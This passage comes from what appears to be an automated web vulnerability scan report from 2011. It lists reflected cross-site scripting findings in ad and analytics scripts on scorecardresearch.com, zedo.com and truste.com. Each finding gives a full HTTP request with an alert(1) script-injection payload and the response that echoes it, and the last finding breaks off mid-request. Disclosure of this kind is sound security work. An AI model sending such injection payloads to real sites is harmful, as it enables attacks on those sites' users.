if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"2ced28<script>alert(1)</script>e7b022f98a9", c2:"7290380", c3:"", c4:"http://www.americanbankingnews.com/2011/05/09/morgan-stanley-ms-analysts-upgrade-citigroup-c-shares-to-overweight/", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

2.68. http://b.scorecardresearch.com/beacon.js [c10 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload b3097<script>alert(1)</script>f589747a68c was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=7&c4=14739&c5=28335&c6=&c10=174883b3097<script>alert(1)</script>f589747a68c&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064833_61548615?t=1304957839488&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.sfgate.com%2Fcgi-bin%2Farticle.cgi%3Ff%3D%2Fg%2Fa%2F2011%2F05%2F08%2Fbloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 16 May 2011 16:18:23 GMT
Date: Mon, 09 May 2011 16:18:23 GMT
Connection: close
Content-Length: 1248

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
th-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"8", c2:"2113", c3:"7", c4:"14739", c5:"28335", c6:"", c10:"174883b3097<script>alert(1)</script>f589747a68c", c15:"", c16:"", r:""});

2.69. http://b.scorecardresearch.com/beacon.js [c15 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 5b2fa<script>alert(1)</script>164fc38593a was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=7290380&c3=&c4=http://www.americanbankingnews.com/2011/05/09/morgan-stanley-ms-analysts-upgrade-citigroup-c-shares-to-overweight/&c5=&c6=&c15=5b2fa<script>alert(1)</script>164fc38593a HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.americanbankingnews.com/2011/05/09/morgan-stanley-ms-analysts-upgrade-citigroup-c-shares-to-overweight/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 16 May 2011 16:18:22 GMT
Date: Mon, 09 May 2011 16:18:22 GMT
Connection: close
Content-Length: 3702

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...

COMSCORE.beacon({c1:"2", c2:"7290380", c3:"", c4:"http://www.americanbankingnews.com/2011/05/09/morgan-stanley-ms-analysts-upgrade-citigroup-c-shares-to-overweight/", c5:"", c6:"", c10:"", c15:"5b2fa<script>alert(1)</script>164fc38593a", c16:"", r:""});

2.70. http://b.scorecardresearch.com/beacon.js [c2 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload f8794<script>alert(1)</script>990c0c09500 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=7290380f8794<script>alert(1)</script>990c0c09500&c3=&c4=http://www.americanbankingnews.com/2011/05/09/morgan-stanley-ms-analysts-upgrade-citigroup-c-shares-to-overweight/&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.americanbankingnews.com/2011/05/09/morgan-stanley-ms-analysts-upgrade-citigroup-c-shares-to-overweight/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 16 May 2011 16:18:21 GMT
Date: Mon, 09 May 2011 16:18:21 GMT
Connection: close
Content-Length: 3702

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"2", c2:"7290380f8794<script>alert(1)</script>990c0c09500", c3:"", c4:"http://www.americanbankingnews.com/2011/05/09/morgan-stanley-ms-analysts-upgrade-citigroup-c-shares-to-overweight/", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

2.71. http://b.scorecardresearch.com/beacon.js [c3 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 2a908<script>alert(1)</script>717b0f7e39e was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=7290380&c3=2a908<script>alert(1)</script>717b0f7e39e&c4=http://www.americanbankingnews.com/2011/05/09/morgan-stanley-ms-analysts-upgrade-citigroup-c-shares-to-overweight/&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.americanbankingnews.com/2011/05/09/morgan-stanley-ms-analysts-upgrade-citigroup-c-shares-to-overweight/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 16 May 2011 16:18:22 GMT
Date: Mon, 09 May 2011 16:18:22 GMT
Connection: close
Content-Length: 3702

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
ry{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"2", c2:"7290380", c3:"2a908<script>alert(1)</script>717b0f7e39e", c4:"http://www.americanbankingnews.com/2011/05/09/morgan-stanley-ms-analysts-upgrade-citigroup-c-shares-to-overweight/", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

2.72. http://b.scorecardresearch.com/beacon.js [c4 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 931e9<script>alert(1)</script>615e770421f was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=7290380&c3=&c4=http://www.americanbankingnews.com/2011/05/09/morgan-stanley-ms-analysts-upgrade-citigroup-c-shares-to-overweight/931e9<script>alert(1)</script>615e770421f&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.americanbankingnews.com/2011/05/09/morgan-stanley-ms-analysts-upgrade-citigroup-c-shares-to-overweight/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 16 May 2011 16:18:22 GMT
Date: Mon, 09 May 2011 16:18:22 GMT
Connection: close
Content-Length: 3702

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"2", c2:"7290380", c3:"", c4:"http://www.americanbankingnews.com/2011/05/09/morgan-stanley-ms-analysts-upgrade-citigroup-c-shares-to-overweight/931e9<script>alert(1)</script>615e770421f", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

2.73. http://b.scorecardresearch.com/beacon.js [c5 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 6d9e5<script>alert(1)</script>cee175e7a20 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=7290380&c3=&c4=http://www.americanbankingnews.com/2011/05/09/morgan-stanley-ms-analysts-upgrade-citigroup-c-shares-to-overweight/&c5=6d9e5<script>alert(1)</script>cee175e7a20&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.americanbankingnews.com/2011/05/09/morgan-stanley-ms-analysts-upgrade-citigroup-c-shares-to-overweight/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 16 May 2011 16:18:22 GMT
Date: Mon, 09 May 2011 16:18:22 GMT
Connection: close
Content-Length: 3702

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"2", c2:"7290380", c3:"", c4:"http://www.americanbankingnews.com/2011/05/09/morgan-stanley-ms-analysts-upgrade-citigroup-c-shares-to-overweight/", c5:"6d9e5<script>alert(1)</script>cee175e7a20", c6:"", c10:"", c15:"", c16:"", r:""});

2.74. http://b.scorecardresearch.com/beacon.js [c6 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload a1173<script>alert(1)</script>a800f1ecc89 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=7290380&c3=&c4=http://www.americanbankingnews.com/2011/05/09/morgan-stanley-ms-analysts-upgrade-citigroup-c-shares-to-overweight/&c5=&c6=a1173<script>alert(1)</script>a800f1ecc89&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.americanbankingnews.com/2011/05/09/morgan-stanley-ms-analysts-upgrade-citigroup-c-shares-to-overweight/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 16 May 2011 16:18:22 GMT
Date: Mon, 09 May 2011 16:18:22 GMT
Connection: close
Content-Length: 3702

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
OMSCORE.purge();

COMSCORE.beacon({c1:"2", c2:"7290380", c3:"", c4:"http://www.americanbankingnews.com/2011/05/09/morgan-stanley-ms-analysts-upgrade-citigroup-c-shares-to-overweight/", c5:"", c6:"a1173<script>alert(1)</script>a800f1ecc89", c10:"", c15:"", c16:"", r:""});

2.75. http://c7.zedo.com/bar/v16-406/c5/jsc/fm.js [$ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/bar/v16-406/c5/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9137f"%3balert(1)//14068322299 was submitted in the $ parameter. This input was echoed as 9137f";alert(1)//14068322299 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bar/v16-406/c5/jsc/fm.js?c=24&a=0&f=&n=1452&r=13&d=15&q=&$=9137f"%3balert(1)//14068322299&s=0&z=0.3088119877502322 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.schaeffersresearch.com/commentary/content/stocks+on+the+move+citigroup+inc+and+nvidia+corporation/trading_floor_blog.aspx?single=true&blogid=106213
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; FFCap=1581B1219,212244|0,1,1; __qca=P0-591305981-1304358415303; PI=h749620Za805982Zc305002744%2C305002744Zs263Zt1122; FFAbh=847B162,20|313_1#365; ZFFAbh=845B826,20|1451_856#376Z1117_846#366Z798_845#365; FFgeo=2241452; ZCBC=1; FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041:1099,2#702968|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1:0,17,1; FFcat=1099,2,9; FFad=0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1452:9137f";alert(1)//14068322299;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1452,24,15:1099,2,9;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFCap=1581B1219,212244:1452,206974|0,1,1:0,9,1;expires=Wed, 08 Jun 2011 16:17:19 GMT;path=/;domain=.zedo.com;
ETag: "867f4fde-838c-4a1e244fdb0c0"
Vary: Accept-Encoding
X-Varnish: 545954245 545953947
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=92
Expires: Mon, 09 May 2011 16:18:51 GMT
Date: Mon, 09 May 2011 16:17:19 GMT
Connection: close
Content-Length: 16729

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat=',9137f";alert(1)//14068322299';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=,9137f";alert(1)//14068322299;z="+Math.random();}

if(zzuid=='unknown')zzuid='5ajh4goBADQAAFjiiCYAAABN~042311';

var zzhasAd=undefined;

var zzStr = "s=0;u=5ajh4goBADQAAFjiiCYAAABN~042311;z=" + Ma
...[SNIP]...

2.76. http://c7.zedo.com/bar/v16-406/c5/jsc/fm.js [$ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/bar/v16-406/c5/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5f270'%3balert(1)//e1849576474 was submitted in the $ parameter. This input was echoed as 5f270';alert(1)//e1849576474 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bar/v16-406/c5/jsc/fm.js?c=24&a=0&f=&n=1452&r=13&d=15&q=&$=5f270'%3balert(1)//e1849576474&s=0&z=0.3088119877502322 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.schaeffersresearch.com/commentary/content/stocks+on+the+move+citigroup+inc+and+nvidia+corporation/trading_floor_blog.aspx?single=true&blogid=106213
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; FFCap=1581B1219,212244|0,1,1; __qca=P0-591305981-1304358415303; PI=h749620Za805982Zc305002744%2C305002744Zs263Zt1122; FFAbh=847B162,20|313_1#365; ZFFAbh=845B826,20|1451_856#376Z1117_846#366Z798_845#365; FFgeo=2241452; ZCBC=1; FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041:1099,2#702968|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1:0,17,1; FFcat=1099,2,9; FFad=0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1452:5f270';alert(1)//e1849576474;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1452,24,15:1099,2,9;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFCap=1581B1219,212244:1452,206974|0,1,1:0,9,1;expires=Wed, 08 Jun 2011 16:17:19 GMT;path=/;domain=.zedo.com;
ETag: "867f4fde-838c-4a1e244fdb0c0"
Vary: Accept-Encoding
X-Varnish: 545954245 545953947
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=92
Expires: Mon, 09 May 2011 16:18:51 GMT
Date: Mon, 09 May 2011 16:17:19 GMT
Connection: close
Content-Length: 16729

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat=',5f270';alert(1)//e1849576474';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=,5f270';alert(1)//e1849576474;z="+Math.random();}

if(zzuid=='unknown')zzuid='5ajh4goBADQAAFjiiCYAAABN~042311';

var zzhasA
...[SNIP]...

2.77. http://c7.zedo.com/bar/v16-406/c5/jsc/fm.js [q parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/bar/v16-406/c5/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 75bde'%3balert(1)//e55ed695795 was submitted in the q parameter. This input was echoed as 75bde';alert(1)//e55ed695795 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bar/v16-406/c5/jsc/fm.js?c=24&a=0&f=&n=1452&r=13&d=15&q=75bde'%3balert(1)//e55ed695795&$=&s=0&z=0.3088119877502322 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.schaeffersresearch.com/commentary/content/stocks+on+the+move+citigroup+inc+and+nvidia+corporation/trading_floor_blog.aspx?single=true&blogid=106213
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; FFCap=1581B1219,212244|0,1,1; __qca=P0-591305981-1304358415303; PI=h749620Za805982Zc305002744%2C305002744Zs263Zt1122; FFAbh=847B162,20|313_1#365; ZFFAbh=845B826,20|1451_856#376Z1117_846#366Z798_845#365; FFgeo=2241452; ZCBC=1; FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041:1099,2#702968|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1:0,17,1; FFcat=1099,2,9; FFad=0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1581B1219,212244:1452,206974|0,1,1:0,9,1;expires=Wed, 08 Jun 2011 16:17:19 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1452,24,15:1099,2,9;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "867f4fde-838c-4a1e244fdb0c0"
Vary: Accept-Encoding
X-Varnish: 545954245 545953947
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=92
Expires: Mon, 09 May 2011 16:18:51 GMT
Date: Mon, 09 May 2011 16:17:19 GMT
Connection: close
Content-Length: 16726

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat='75bde';alert(1)//e55ed695795';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=75bde';alert(1)//e55ed695795;z="+Math.random();}

if(zzuid=='unknown')zzuid='5ajh4goBADQAAFjiiCYAAABN~042311';

var zzhasAd
...[SNIP]...

2.78. http://c7.zedo.com/bar/v16-406/c5/jsc/fm.js [q parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/bar/v16-406/c5/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91467"%3balert(1)//454c78cb9ab was submitted in the q parameter. This input was echoed as 91467";alert(1)//454c78cb9ab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bar/v16-406/c5/jsc/fm.js?c=24&a=0&f=&n=1452&r=13&d=15&q=91467"%3balert(1)//454c78cb9ab&$=&s=0&z=0.3088119877502322 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.schaeffersresearch.com/commentary/content/stocks+on+the+move+citigroup+inc+and+nvidia+corporation/trading_floor_blog.aspx?single=true&blogid=106213
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; FFCap=1581B1219,212244|0,1,1; __qca=P0-591305981-1304358415303; PI=h749620Za805982Zc305002744%2C305002744Zs263Zt1122; FFAbh=847B162,20|313_1#365; ZFFAbh=845B826,20|1451_856#376Z1117_846#366Z798_845#365; FFgeo=2241452; ZCBC=1; FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041:1099,2#702968|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1:0,17,1; FFcat=1099,2,9; FFad=0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1581B1219,212244:1452,206974|0,1,1:0,9,1;expires=Wed, 08 Jun 2011 16:17:19 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1452,24,15:1099,2,9;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "867f4fde-838c-4a1e244fdb0c0"
Vary: Accept-Encoding
X-Varnish: 545954245 545953947
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=93
Expires: Mon, 09 May 2011 16:18:52 GMT
Date: Mon, 09 May 2011 16:17:19 GMT
Connection: close
Content-Length: 16726

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat='91467";alert(1)//454c78cb9ab';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=91467";alert(1)//454c78cb9ab;z="+Math.random();}

if(zzuid=='unknown')zzuid='5ajh4goBADQAAFjiiCYAAABN~042311';

var zzhasAd=undefined;

var zzStr = "s=0;u=5ajh4goBADQAAFjiiCYAAABN~042311;z=" + Ma
...[SNIP]...

2.79. http://choices.truste.com/ca [c parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://choices.truste.com
Path:	/ca

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload 12bed<script>alert(1)</script>657c9c8ac64 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl728x90&c=att02cont312bed<script>alert(1)</script>657c9c8ac64&w=728&h=90&ox=20&zi=10002&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
